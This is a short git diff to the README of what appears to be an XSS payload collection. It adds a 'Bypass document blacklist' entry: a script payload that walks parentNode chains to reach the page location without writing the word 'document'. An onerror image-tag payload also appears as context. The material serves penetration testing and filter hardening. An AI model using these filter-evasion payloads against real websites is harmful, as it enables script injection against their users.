diff --git a/XSS injection/README.md b/XSS injection/README.md
index a2c729f..cd5ccc9 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -422,6 +422,10 @@ Bypass with incomplete html tag - IE/Firefox/Chrome/Safari
 <img src='1' onerror='alert(0)' <
 ```
 
+Bypass document blacklist
+```
+<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
+```
 
 Bypass using javascript inside a string
 ```